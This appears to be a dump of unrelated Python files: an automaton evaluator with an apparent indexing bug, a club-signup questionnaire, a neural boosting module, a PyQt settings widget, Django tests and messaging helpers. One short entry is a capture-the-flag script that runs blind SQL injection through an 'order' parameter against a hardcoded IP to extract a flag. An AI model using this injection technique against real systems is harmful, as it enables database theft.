def __init__(self, state_id,is_initial, is_final, edges=None):
self.state_id = state_id
self.is_initial = is_initial
self.is_final = is_final
if edges is None:
self.edges = []
else:
self.edges = edges
class Edge:
def __init__(self, initial_state, final_state, edge_accepted_values=None):
self.initial_state = initial_state
self.final_state = final_state
if edge_accepted_values is None:
self.edge_accepted_values = []
else:
self.edge_accepted_values = edge_accepted_values
class DFA(Automaton):
def __init__(self, automaton,initial_state, final_state, states=None):
super().__init__(automaton)
self.initial_state = initial_state
self.final_state = final_state
if states is None:
self.states = []
else:
self.states = states
def evaluate_expresion_by_automaton(self, expresion_str,actual_state):
if expresion_str != "":
expresion_arr = list(expresion_str)
for x in range(0,len(actual_state.edges)):
for z in range(0, len(expresion_arr)):
if any(expresion_arr[z] in s for s in actual_state.edges[x].edge_accepted_values):
if expresion_str != "":
expresion_arr.remove(expresion_arr[x])
expresion_str = ''.join(expresion_arr)
actual_state = next((a for a in self.states if a.state_id == actual_state.edges[x].final_state), None)
return self.evaluate_expresion_by_automaton(expresion_str, actual_state)
elif actual_state.is_final and expresion_str == "" :
return True
else:
return False
elif actual_state.is_final:
return True
else:
return False
class NDFA(Automaton):
def __init__(self, automaton,initial_state, final_state, states=None):
super().__init__(automaton)
self.initial_state = initial_state
self.final_state = final_state
if states is None:
self.states = []
else:
self.states = states
def evaluate_expresion_by_automaton(self, expresion_str,actual_state):
if expresion_str != "":
expresion_arr = list(expresion_str)
for x in range(0,len(actual_state.edges)):
for z in range(0, len(expresion_arr)):
if any(expresion_arr[z] in s for s in actual_state.edges[x].edge_accepted_values):
if expresion_str != "":
expresion_arr.remove(expresion_arr[x])
expresion_str = ''.join(expresion_arr)
actual_state = next((a for a in self.states if a.state_id == actual_state.edges[x].final_state), None)
return self.evaluate_expresion_by_automaton(expresion_str, actual_state)
elif actual_state.is_final and expresion_str == "" :
return True
else:
return False
elif actual_state.is_final:
return True
else:
return False
automaton_file = xlrd.open_workbook("Automaton.xlsx")
sheet = automaton_file.sheet_by_index(0)
action = int(sheet.cell_value(0,1))
run_program = True
while run_program:
if action == 1:
obj_automaton = Automaton.read_from_xls(automaton_file)
if obj_automaton == None:
print("Syntax error, check the automaton")
else:
expresion_str = input("write an expresion and press enter to evaluate in automaton: ")
if expresion_str == "exit":
run_program = False
print(obj_automaton.evaluate_expresion_by_automaton(expresion_str,obj_automaton.initial_state))
elif action == 2:
automaton_arr.pop(0)
obj_automaton = Automaton.read_from_str(automaton_arr)
|
998,337 | b3b99dcbcd9774fe49919157f85e6bb9e13a24c8 | #Alaska Miller
#6/23/2020
#The Perpouse of this program is to promt the human end user anwser a series of questions and then check the anwnsers of those questions against a previously recorded list of responses and checks the inputed responses against those, if they match then the user is told they may join a club, if not they are denied membership:
def main():
#This section of code creates a blank list and a predermined "answer" list:
inputList = []
ansList = ["N/A","y","y"]
#This section of code promts the human end user to either begin the process for applying to join the club, or thanks them for their time if they do not want to join the club:
promtYn = input("Do you want to join a coding club? (y/n):")
if promtYn == "y":
#This section of code asks the human end user if they are okay with answering some questions about themselves in order to join, and then either runs a set of code to get that input they need to create
areYouSure = input("Great, but first we need to ask you some questions, is this okay with you? (y/n):")
if promtYn == "y":
#This section of code promts the human end user to answer three questions, and then records the responses of all three, even though the first question is not actually applicable as to whether or not you will actually get into club, and exists soley for stastical perpouses:
questionOne = input("Okay good! So our first question is, do you know any sort of programing langauge (y/n):")
if questionOne == "y":
print("Okay good! So our first question is, do you know any sort of programing langauge (y/n): "+str(questionOne))
inputList.append("y")
if questionOne == "n":
print(" ")
print("Okay good! So our first question is, do you know any sort of programing langauge (y/n): "+str(questionOne))
inputList.append("n")
questionTwo = input("Now for question 2, are you willing to contribute to a safe and postive enviroment for our club? (y/n): ")
if questionTwo == "y":
print(" ")
print("Now for question 2, are you willing to contribute to a safe and postive enviroment for our club? (y/n): "+str(questionTwo))
inputList.append("y")
if questionTwo == "n":
print(" ")
print("Now for question 2, are you willing to contribute to a safe and postive enviroment for our club? (y/n): "+str(questionTwo))
inputList.append("n")
questionThree = input("Okay third and final question, are you willing to learn new things over the course of being in this club? (y/n): ")
if questionThree == "y":
print(" ")
print("Okay third and final question, are you willing to learn new things over the course of being in this club? (y/n): "+str(questionThree))
inputList.append("y")
if questionThree == "n":
print(" ")
print("Okay third and final question, are you willing to learn new things over the course of being in this club? (y/n): "+str(questionThree))
inputList.append("n")
#This section of code checks if the user inputed question responses to both question #2 or #3 match the required awnsers in the "ansList" list, and if so, welcomes the user to the club, if not they politely reject them from membership:
if inputList[1] == ansList[1] and inputList[2] == ansList[2]:
print(" ")
print("Congradulations! You can join the coding club!!!")
if inputList[0] == str("y"):
print(" ")
print("We are glad to have someone who is allready exprienced in the club!")
print(" ")
print("We are also glad that you are willing to work with others and learn from others as well!")
if inputList[1] != ansList[1] and inputList[2] != ansList[2]:
print("We are sorry but we don't think you are the kind of person we are looking for in our club, we are truely sorry, please contact the club administrator if you belive this to be a mistake!")
if promtYn == "n":
print("Sorry but these questions are required to gain club membership")
if promtYn == "n":
print("Okay thank you for your time")
main()
|
998,338 | dc4b0a630843073d1cf548b0a5e9e411d500f733 | """
Boosting as described by David et al. (2007).
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
from inspect import getargspec
from itertools import chain, product
from math import floor
from multiprocessing import Process, Queue, cpu_count
from multiprocessing.sharedctypes import RawArray
import time
from threading import Thread
import numpy as np
from numpy import newaxis
from scipy.stats import spearmanr
from tqdm import tqdm
from .. import _colorspaces as cs
from .._data_obj import NDVar, UTS, dataobj_repr
from .._stats.error_functions import (l1, l2, l1_for_delta, l2_for_delta,
update_error)
from .._utils import LazyProperty
# BoostingResult version
VERSION = 6
# cross-validation
N_SEGS = 10
# multiprocessing (0 = single process)
N_WORKERS = cpu_count()
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': l2_for_delta, 'l1': l1_for_delta}
class BoostingResult(object):
"""Result from boosting a temporal response function
Attributes
----------
h : NDVar | tuple of NDVar
The temporal response function. Whether ``h`` is an NDVar or a tuple of
NDVars depends on whether the ``x`` parameter to :func:`boosting` was
an NDVar or a sequence of NDVars.
h_scaled : NDVar | tuple of NDVar
``h`` scaled such that it applies to the original input ``y`` and ``x``.
If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
as ``h``.
r : float | NDVar
Correlation between the measured response and the response predicted
with ``h``. Type depends on the ``y`` parameter to :func:`boosting`.
spearmanr : float | NDVar
As ``r``, the Spearman rank correlation.
t_run : float
Time it took to run the boosting algorithm (in seconds).
error : str
The error evaluation method used.
fit_error : float | NDVar
The fit error, i.e. the result of the ``error`` error function on the
final fit.
delta : scalar
Kernel modification step used.
mindelta : None | scalar
Mindelta parameter used.
scale_data : bool
Scale_data parameter used.
y_mean : NDVar | scalar
Mean that was subtracted from ``y``.
y_scale : NDVar | scalar
Scale by which ``y`` was divided.
x_mean : NDVar | scalar | tuple
Mean that was subtracted from ``x``.
x_scale : NDVar | scalar | tuple
Scale by which ``x`` was divided.
"""
def __init__(self, h, r, isnan, t_run, version, delta, mindelta, error,
spearmanr, fit_error, scale_data, y_mean, y_scale, x_mean,
x_scale, y=None, x=None, tstart=None, tstop=None):
self.h = h
self.r = r
self.isnan = isnan
self.t_run = t_run
self.version = version
self.delta = delta
self.mindelta = mindelta
self.error = error
self.spearmanr = spearmanr
self.fit_error = fit_error
self.scale_data = scale_data
self.y_mean = y_mean
self.y_scale = y_scale
self.x_mean = x_mean
self.x_scale = x_scale
self.y = y
self.x = x
self.tstart = tstart
self.tstop = tstop
def __getstate__(self):
return {attr: getattr(self, attr) for attr in
getargspec(self.__init__).args[1:]}
def __setstate__(self, state):
self.__init__(**state)
def __repr__(self):
if self.x is None or isinstance(self.x, str):
x = self.x
else:
x = ' + '.join(map(str, self.x))
items = ['boosting %s ~ %s' % (self.y, x),
'%g - %g' % (self.tstart, self.tstop)]
argspec = getargspec(boosting)
names = argspec.args[-len(argspec.defaults):]
for name, default in zip(names, argspec.defaults):
value = getattr(self, name)
if value != default:
items.append('%s=%r' % (name, value))
return '<%s>' % ', '.join(items)
@LazyProperty
def h_scaled(self):
if self.y_scale is None:
return self.h
elif isinstance(self.h, NDVar):
return self.h * (self.y_scale / self.x_scale)
else:
return tuple(h * (self.y_scale / sx) for h, sx in
zip(self.h, self.x_scale))
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
error='l2'):
"""Estimate a temporal response function through boosting
Parameters
----------
y : NDVar
Signal to predict.
x : NDVar | sequence of NDVar
Signal to use to predict ``y``. Can be sequence of NDVars to include
multiple predictors. Time dimension must correspond to ``y``.
tstart : float
Start of the TRF in seconds.
tstop : float
Stop of the TRF in seconds.
scale_data : bool | 'inplace'
Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
the standard deviation (when ``error='l2'``) or the mean absolute
value (when ``error='l1'``). With ``scale_data=True`` (default) the
original ``y`` and ``x`` are left untouched; use ``'inplace'`` to save
memory by scaling the original ``y`` and ``x``.
delta : scalar
Step for changes in the kernel.
mindelta : scalar
If the error for the training data can't be reduced, divide ``delta``
in half until ``delta < mindelta``. The default is ``mindelta = delta``,
i.e. ``delta`` is constant.
error : 'l2' | 'l1'
Error function to use (default is ``l2``).
Returns
-------
result : BoostingResult
Object containing results from the boosting estimation (see
:class:`BoostingResult`).
"""
# check arguments
mindelta_ = delta if mindelta is None else mindelta
# check y and x
if isinstance(x, NDVar):
x_name = x.name
x = (x,)
multiple_x = False
else:
x = tuple(x)
assert all(isinstance(x_, NDVar) for x_ in x)
x_name = tuple(x_.name for x_ in x)
multiple_x = True
y_name = y.name
time_dim = y.get_dim('time')
if any(x_.get_dim('time') != time_dim for x_ in x):
raise ValueError("Not all NDVars have the same time dimension")
# scale y and x appropriately for error function
data = (y,) + x
if scale_data:
data_mean = tuple(d.mean('time') for d in data)
if isinstance(scale_data, int):
data = tuple(d - d_mean for d, d_mean in zip(data, data_mean))
elif isinstance(scale_data, str):
if scale_data == 'inplace':
for d, d_mean in zip(data, data_mean):
d -= d_mean
else:
raise ValueError("scale_data=%r" % scale_data)
else:
raise TypeError("scale_data=%r" % (scale_data,))
if error == 'l1':
data_scale = tuple(d.abs().mean('time') for d in data)
elif error == 'l2':
data_scale = tuple(d.std('time') for d in data)
else:
raise ValueError("error=%r; needs to be 'l1' or 'l2' if "
"scale_data=True." % (error,))
# check for flat data (normalising would result in nan)
zero_var = tuple(np.any(v == 0) for v in data_scale)
if any(zero_var):
raise ValueError("Can not scale %s because it has 0 variance" %
dataobj_repr(data[zero_var.index(True)]))
for d, d_scale in zip(data, data_scale):
d /= d_scale
y = data[0]
x = data[1:]
has_nan = tuple(np.isnan(v.sum()) for v in data_scale)
else:
data_mean = data_scale = (None,) * (len(x) + 1)
has_nan = tuple(np.isnan(v.sum()) for v in data)
# check for NaN (blocks boosting process)
if any(has_nan):
raise ValueError("Can not use %s for boosting because it contains NaN" %
dataobj_repr(data[has_nan.index(True)]))
# x_data: predictor x time array
x_data = []
x_meta = []
n_x = 0
for x_ in x:
if x_.ndim == 1:
xdim = None
data = x_.x[newaxis, :]
index = n_x
elif x_.ndim == 2:
xdim = x_.dims[not x_.get_axis('time')]
data = x_.get_data((xdim.name, 'time'))
index = slice(n_x, n_x + len(data))
else:
raise NotImplementedError("x with more than 2 dimensions")
x_data.append(data)
x_meta.append((x_.name, xdim, index))
n_x += len(data)
if len(x_data) == 1:
x_data = x_data[0]
else:
x_data = np.vstack(x_data)
# y_data: ydim x time array
if y.ndim == 1:
ydim = None
y_data = y.x[None, :]
elif y.ndim == 2:
ydim = y.dims[not y.get_axis('time')]
y_data = y.get_data((ydim.name, 'time'))
else:
raise NotImplementedError("y with more than 2 dimensions")
# TRF extra dimension
trf_dim = ydim
# prepare trf (by cropping data)
i_start = int(round(tstart / time_dim.tstep))
i_stop = int(round(tstop / time_dim.tstep))
trf_length = i_stop - i_start
if i_start < 0:
x_data = x_data[:, -i_start:]
y_data = y_data[:, :i_start]
elif i_start > 0:
x_data = x_data[:, :-i_start]
y_data = y_data[:, i_start:]
# progress bar
n_y = len(y_data)
pbar = tqdm(desc="Boosting %i signals" % n_y if n_y > 1 else "Boosting",
total=n_y * 10)
# result containers
res = np.empty((3, n_y)) # r, rank-r, error
h_x = np.empty((n_y, n_x, trf_length))
# boosting
if N_WORKERS:
# Make sure cross-validations are added in the same order, otherwise
# slight numerical differences can occur
job_queue, result_queue = setup_workers(
y_data, x_data, trf_length, delta, mindelta_, N_SEGS, error)
Thread(target=put_jobs, args=(job_queue, n_y, N_SEGS)).start()
# collect results
h_segs = {}
for _ in range(n_y * N_SEGS):
y_i, seg_i, h = result_queue.get()
pbar.update()
if y_i in h_segs:
h_seg = h_segs[y_i]
h_seg[seg_i] = h
if len(h_seg) == N_SEGS:
del h_segs[y_i]
hs = [h for h in (h_seg[i] for i in range(N_SEGS)) if
h is not None]
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
res[:, y_i] = evaluate_kernel(y_data[y_i], x_data, h, error)
else:
h_x[y_i] = 0
res[:, y_i] = 0.
else:
h_segs[y_i] = {seg_i: h}
else:
for y_i, y_ in enumerate(y_data):
hs = []
for i in range(N_SEGS):
h = boost_1seg(x_data, y_, trf_length, delta, N_SEGS, i,
mindelta_, error)
if h is not None:
hs.append(h)
pbar.update()
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
res[:, y_i] = evaluate_kernel(y_, x_data, h, error)
else:
h_x[y_i].fill(0)
res[:, y_i].fill(0.)
pbar.close()
dt = time.time() - pbar.start_t
# correlation
rs, rrs, errs = res
if ydim is None:
r = rs[0]
rr = rrs[0]
err = errs[0]
isnan = np.isnan(r)
else:
isnan = np.isnan(rs)
rs[isnan] = 0
r = NDVar(rs, (ydim,), cs.stat_info('r'), 'correlation')
rr = NDVar(rrs, (ydim,), cs.stat_info('r'), 'rank correlation')
err = NDVar(errs, (ydim,), y.info.copy(), 'fit error')
# TRF
h_time = UTS(tstart, time_dim.tstep, trf_length)
hs = []
for name, dim, index in x_meta:
h_x_ = h_x[:, index, :]
if dim is None:
dims = (h_time,)
else:
dims = (dim, h_time)
if trf_dim is None:
h_x_ = h_x_[0]
else:
dims = (trf_dim,) + dims
hs.append(NDVar(h_x_, dims, y.info.copy(), name))
if multiple_x:
hs = tuple(hs)
idx = slice(1, None)
else:
hs = hs[0]
idx = 1
return BoostingResult(hs, r, isnan, dt, VERSION, delta, mindelta, error, rr,
err, scale_data, data_mean[0], data_scale[0],
data_mean[idx], data_scale[idx], y_name, x_name,
tstart, tstop)
def boost_1seg(x, y, trf_length, delta, nsegs, segno, mindelta, error,
return_history=False):
"""Boosting with one test segment determined by regular division
Based on port of svdboostV4pred
Parameters
----------
x : array (n_stims, n_times)
Stimulus.
y : array (n_times,)
Dependent signal, time series to predict.
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
nsegs : int
Number of segments
segno : int [0, nsegs-1]
which segment to use for testing
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : 'l2' | 'Sabs'
Error function to use.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
SSE for test data at each iteration.
"""
assert x.ndim == 2
assert y.shape == (x.shape[1],)
# separate training and testing signal
test_seg_len = int(floor(x.shape[1] / nsegs))
test_index = slice(test_seg_len * segno, test_seg_len * (segno + 1))
if segno == 0:
train_index = (slice(test_seg_len, None),)
elif segno == nsegs-1:
train_index = (slice(0, -test_seg_len),)
elif segno < 0 or segno >= nsegs:
raise ValueError("segno=%r" % segno)
else:
train_index = (slice(0, test_seg_len * segno),
slice(test_seg_len * (segno + 1), None))
y_train = tuple(y[..., i] for i in train_index)
y_test = (y[..., test_index],)
x_train = tuple(x[:, i] for i in train_index)
x_test = (x[:, test_index],)
return boost_segs(y_train, y_test, x_train, x_test, trf_length, delta,
mindelta, error, return_history)
def boost_segs(y_train, y_test, x_train, x_test, trf_length, delta, mindelta,
error, return_history):
"""Boosting supporting multiple array segments
Parameters
----------
y_train, y_test : tuple of array (n_times,)
Dependent signal, time series to predict.
x_train, x_test : array (n_stims, n_times)
Stimulus.
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : str
Error function to use.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
SSE for test data at each iteration.
"""
delta_error = DELTA_ERROR_FUNC[error]
error = ERROR_FUNC[error]
n_stims = len(x_train[0])
if any(len(x) != n_stims for x in chain(x_train, x_test)):
raise ValueError("Not all x have same number of stimuli")
n_times = [len(y) for y in chain(y_train, y_test)]
if any(x.shape[1] != n for x, n in zip(chain(x_train, x_test), n_times)):
raise ValueError("y and x have inconsistent number of time points")
h = np.zeros((n_stims, trf_length))
# buffers
y_train_error = tuple(y.copy() for y in y_train)
y_test_error = tuple(y.copy() for y in y_test)
ys_error = y_train_error + y_test_error
xs = x_train + x_test
new_error = np.empty(h.shape)
new_sign = np.empty(h.shape, np.int8)
# history lists
history = []
test_error_history = []
# pre-assign iterators
iter_h = tuple(product(range(h.shape[0]), range(h.shape[1])))
iter_train_error = list(zip(y_train_error, x_train))
iter_error = list(zip(ys_error, xs))
for i_boost in range(999999):
history.append(h.copy())
# evaluate current h
e_test = sum(error(y) for y in y_test_error)
e_train = sum(error(y) for y in y_train_error)
test_error_history.append(e_test)
# stop the iteration if all the following requirements are met
# 1. more than 10 iterations are done
# 2. The testing error in the latest iteration is higher than that in
# the previous two iterations
if (i_boost > 10 and e_test > test_error_history[-2] and
e_test > test_error_history[-3]):
# print("error(test) not improving in 2 steps")
break
# generate possible movements -> training error
for i_stim, i_time in iter_h:
# +/- delta
e_add = e_sub = 0.
for y_err, x in iter_train_error:
e_add_, e_sub_ = delta_error(y_err, x[i_stim], delta, i_time)
e_add += e_add_
e_sub += e_sub_
if e_add > e_sub:
new_error[i_stim, i_time] = e_sub
new_sign[i_stim, i_time] = -1
else:
new_error[i_stim, i_time] = e_add
new_sign[i_stim, i_time] = 1
i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
new_train_error = new_error[i_stim, i_time]
delta_signed = new_sign[i_stim, i_time] * delta
# If no improvements can be found reduce delta
if new_train_error > e_train:
delta *= 0.5
if delta >= mindelta:
# print("new delta: %s" % delta)
continue
else:
# print("No improvement possible for training data")
break
# update h with best movement
h[i_stim, i_time] += delta_signed
# abort if we're moving in circles
if i_boost >= 2 and h[i_stim, i_time] == history[-2][i_stim, i_time]:
# print("Same h after 2 iterations")
break
elif i_boost >= 3 and h[i_stim, i_time] == history[-3][i_stim, i_time]:
# print("Same h after 3 iterations")
break
# update error
for err, x in iter_error:
update_error(err, x[i_stim], delta_signed, i_time)
# else:
# print("maxiter exceeded")
best_iter = np.argmin(test_error_history)
# print(' (%i iterations)' % (i_boost + 1))
if return_history:
return history[best_iter] if best_iter else None, test_error_history
else:
return history[best_iter] if best_iter else None
def setup_workers(y, x, trf_length, delta, mindelta, nsegs, error):
n_y, n_times = y.shape
n_x, _ = x.shape
y_buffer = RawArray('d', n_y * n_times)
y_buffer[:] = y.ravel()
x_buffer = RawArray('d', n_x * n_times)
x_buffer[:] = x.ravel()
job_queue = Queue(200)
result_queue = Queue(200)
args = (y_buffer, x_buffer, n_y, n_times, n_x, trf_length, delta,
mindelta, nsegs, error, job_queue, result_queue)
for _ in range(N_WORKERS):
Process(target=boosting_worker, args=args).start()
return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, n_y, n_times, n_x, trf_length,
delta, mindelta, nsegs, error, job_queue, result_queue):
y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
while True:
y_i, seg_i = job_queue.get()
if y_i == JOB_TERMINATE:
return
h = boost_1seg(x, y[y_i], trf_length, delta, nsegs, seg_i, mindelta,
error)
result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs):
"Feed boosting jobs into a Queue"
for job in product(range(n_y), range(n_segs)):
queue.put(job)
for _ in range(N_WORKERS):
queue.put((JOB_TERMINATE, None))
def apply_kernel(x, h, out=None):
"""Predict ``y`` by applying kernel ``h`` to ``x``
x.shape is (n_stims, n_samples)
h.shape is (n_stims, n_trf_samples)
"""
if out is None:
out = np.zeros(x.shape[1])
else:
out.fill(0)
for ind in range(len(h)):
out += np.convolve(h[ind], x[ind])[:len(out)]
return out
def evaluate_kernel(y, x, h, error):
"""Fit quality statistics
Returns
-------
r : float | array
Pearson correlation.
rank_r : float | array
Spearman rank correlation.
error : float | array
Error corresponding to error_func.
"""
y_pred = apply_kernel(x, h)
# discard onset (length of kernel)
i0 = h.shape[-1] - 1
y = y[..., i0:]
y_pred = y_pred[..., i0:]
error_func = ERROR_FUNC[error]
return (np.corrcoef(y, y_pred)[0, 1],
spearmanr(y, y_pred)[0],
error_func(y - y_pred))
|
998,339 | 81976ec91094be04dfbd0469e698db1d313d6a4f | import requests
import string
flag = "CHTB{"
url = "http://138.68.151.248:31892/api/list"
restart = True
while restart:
restart = False
for i in string.ascii_letters + string.digits + "!@#$*.&+^()@_{}":
payload = flag + i
post_data = {'order': '(select case when (select count(flag) from flag_e6ed09eb02 where instr(flag, \"' + payload + '\")) then id else count end)'}
r = requests.post(url, json=post_data, allow_redirects=False)
if r.json()[0]['id'] == 1:
print(payload)
restart = True
flag = payload
if i == "}":
print("\nFlag: " + flag)
exit(0)
break |
998,340 | 96da8096a5d6476cf8df56b82036579958c12994 | s = input()
count = 0
max = 0
for i in range(len(s)):
if s[i] == 'S':
count =0
else:
count += 1
if count > max:
max = count
print(max) |
998,341 | 6457a7bb8228431264bad4e721df4da88f3cff42 | import sys
from PyQt5 import QtWidgets, QtGui, QtCore
from PyQt5.QtWidgets import (QWidget, QLabel, QLineEdit, QTextEdit, QGridLayout, QVBoxLayout, QRadioButton, QInputDialog)
from hyperparameters.hyperparameterConsts import DistanceAlgorithm
from hyperparameters.hyperparametersState import CollaborativeHyperparametersState
class ParamsWidget(QtWidgets.QWidget):
def __init__(self, width, height):
super().__init__( flags = QtCore.Qt.Window )
self.width = width
self.height = height
self.currentlyChosenAlgorithm = CollaborativeHyperparametersState().distanceAlgorithm
self.initUI()
def initUI(self):
grid = QGridLayout()
grid.setRowStretch(0, 1)
grid.setRowStretch(1, 3)
grid.setRowStretch(2, 3)
grid.setRowStretch(3, 2)
grid.setRowStretch(4, 3)
grid.setRowStretch(5, 1)
saveButton = QtWidgets.QPushButton("Zapisz i wyjdź")
saveButton.setObjectName("PlayerButton")
saveButton.setFixedSize(self.width*0.2, self.height*0.08)
saveButton.clicked.connect(self.saveAndExit)
grid.addWidget(saveButton, 4, 1)
exitButton = QtWidgets.QPushButton("Wróć do menu")
exitButton.setObjectName("PlayerButton")
exitButton.setFixedSize(self.width*0.2, self.height*0.08)
exitButton.clicked.connect(self.exitToMenu)
grid.addWidget(exitButton, 1, 2)
distanceLayout = self.getDistanceLayout()
grid.addLayout(distanceLayout, 2, 1)
neighboursLayout = self.getNeighboursLayout()
grid.addLayout(neighboursLayout, 3, 1)
self.setLayout(grid)
self.show()
def exitToMenu(self):
self.window().showMenu()
def saveAndExit(self):
CollaborativeHyperparametersState().distanceAlgorithm = self.currentlyChosenAlgorithm
print("setting distance {}".format(self.currentlyChosenAlgorithm))
n = self.nInput.text()
if n and n.isdigit():
print("setting number {}".format(n))
CollaborativeHyperparametersState().numberOfNeighbours = int(n)
else:
self.nInput.setText(CollaborativeHyperparametersState().numberOfNeighbours.__str__())
self.window().showMenu()
def algorithmSelectionChanged(self):
radiobutton = self.sender()
if radiobutton.isChecked():
self.currentlyChosenAlgorithm = radiobutton.algorithm
def getDistanceLayout(self):
distanceBox = QGridLayout()
distanceLabel = QLabel('Wybierz metodę obliczania dystansu')
distanceLabel.setObjectName('ParamLabel')
distanceBox.addWidget(distanceLabel, 0, 0)
canberraRadiobutton = QRadioButton("Canberra Distance")
canberraRadiobutton.algorithm = DistanceAlgorithm.canberraDistance
canberraRadiobutton.toggled.connect(self.algorithmSelectionChanged)
self.setChecked(canberraRadiobutton)
distanceBox.addWidget(canberraRadiobutton, 1, 0)
euclideanRadiobutton = QRadioButton("Euclidean distance")
euclideanRadiobutton.algorithm = DistanceAlgorithm.euclideanDistance
euclideanRadiobutton.toggled.connect(self.algorithmSelectionChanged)
self.setChecked(euclideanRadiobutton)
distanceBox.addWidget(euclideanRadiobutton, 3, 0)
cosineDistanceRadiobutton = QRadioButton("Cosine distance")
cosineDistanceRadiobutton.algorithm = DistanceAlgorithm.cosineDistance
cosineDistanceRadiobutton.toggled.connect(self.algorithmSelectionChanged)
self.setChecked(cosineDistanceRadiobutton)
distanceBox.addWidget(cosineDistanceRadiobutton, 2, 0)
manhattanRadiobutton = QRadioButton("Manhattan distance")
manhattanRadiobutton.algorithm = DistanceAlgorithm.manhattanDistance
manhattanRadiobutton.toggled.connect(self.algorithmSelectionChanged)
self.setChecked(manhattanRadiobutton)
distanceBox.addWidget(manhattanRadiobutton, 4, 0)
chebyshevRadiobutton = QRadioButton("Chebyshev distance")
chebyshevRadiobutton.algorithm = DistanceAlgorithm.chebyshevDistance
chebyshevRadiobutton.toggled.connect(self.algorithmSelectionChanged)
self.setChecked(chebyshevRadiobutton)
distanceBox.addWidget(chebyshevRadiobutton, 5, 0)
return distanceBox
def setChecked(self, radiobutton):
currentlyCheckedAlgorithm = CollaborativeHyperparametersState().distanceAlgorithm
if (radiobutton.algorithm == currentlyCheckedAlgorithm):
radiobutton.setChecked(True)
else:
radiobutton.setChecked(False)
def getNeighboursLayout(self):
neighboursGrid = QVBoxLayout()
label = QLabel('Wybierz n w n-nearest neighbours')
label.setObjectName('ParamLabel')
neighboursGrid.addWidget(label)
self.nInput = QLineEdit()
self.nInput.setObjectName('NInput')
self.nInput.setValidator(QtGui.QIntValidator())
self.nInput.setMaxLength(3)
n = CollaborativeHyperparametersState().numberOfNeighbours.__str__()
print("Current n: {}".format(n))
self.nInput.setText(n)
neighboursGrid.addWidget(self.nInput)
return neighboursGrid
|
998,342 | a3e2a90725e4622d29f6216c2e2161b106253e3d | # Make sure your output matches the assignment *exactly*
hours_spent_on_computer = int(input())
if hours_spent_on_computer < 2:
print("That's rare nowadays!")
elif hours_spent_on_computer < 4:
print("This seems reasonable")
else:
print("Don't forget to take breaks!")
|
998,343 | a2743b8b17bd3d5fe88bb81aead4421fed0e2764 | """
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from django.test import TestCase
from users.models import Profile
from goods.models import Comment
from goods.views import try_ban
def test_ban(comment=None):
p = Profile.objects.get(username='forever_banned')
c=comment or Comment.objects.filter(
owner__user__username='forever_banned'
).order_by('-time')[0]
for i in range(0, 10):
q, o_o = Profile.objects.get_or_create(username='qqq%d'%i)
if i % 2 == 0:
m = 1
else: m = 0
c.vote(q, m)
for i in range(0, 10):
d, o_o = Profile.objects.get_or_create(username='dis%d'%i)
c.vote(d, 0)
a = p.is_banned()
# OUT: False
b = try_ban(p)
# OUT: {'mark__avg': 0.25}
c = p.is_banned()
# OUT: True
return a, b, c
class SimpleTest(TestCase):
def test_basic_addition(self):
"""
Tests that 1 + 1 always equals 2.
"""
self.assertEqual(1 + 1, 2)
|
998,344 | 2117673308736aaa7eaef120b18418ee862ae045 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-05-15 16:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='is_essence',
field=models.BooleanField(default=False, verbose_name=b'\xe5\x8a\xa0\xe7\xb2\xbe'),
),
]
|
998,345 | b741f8939acba2b53fab16b1204bffef39ab1eed | from . import base
def send_to_ml(obj, ml_name: str):
"""
Send an object to the specified ml process
@param obj The object to be sent
@param ml_name The name of the target ml process
"""
base.send_to_ml(obj, ml_name)
def send_to_all_ml(obj):
"""
Send an object to all ml processes
@param obj The object to be sent
"""
base.send_to_all_ml(obj)
def recv_from_ml(ml_name, to_wait = False):
"""
Receive an object sent from the specified ml process
@param ml_name The name of the target ml process
@param to_wait Whether to wait until the object is received or not
@return The received object.
If `to_wait` is False and there is nothing to receive, return None.
"""
return base.recv_from_ml(ml_name, to_wait)
def recv_from_all_ml(to_wait = False):
"""
Receive objects sent from all ml processes
@param to_wait Whether to wait until all the objects are received or not
@return A dictionary. The key is the game of the ml process,
the value is the received object from that process.
If `to_wait` is False and there is nothing to receive from that process,
the value will be None.
"""
return base.recv_from_all_ml(to_wait)
def wait_ml_ready(ml_name):
"""
Wait until receiving the ready command from specified the ml process
@param ml_name The name of the target ml process
"""
while recv_from_ml(ml_name, to_wait = True) != "READY":
pass
def wait_all_ml_ready():
"""
Wait until receiving the ready commands from all ml processes
"""
ready_dict = recv_from_all_ml(to_wait = False)
# Wait the ready command one by one
for ml_process, received_msg in ready_dict.items():
while received_msg != "READY":
received_msg = recv_from_ml(ml_process, to_wait = True)
|
998,346 | 31fdb46860c31b2ebe388f62b737b8ace587f187 | import subprocess
def gitSubmodule():
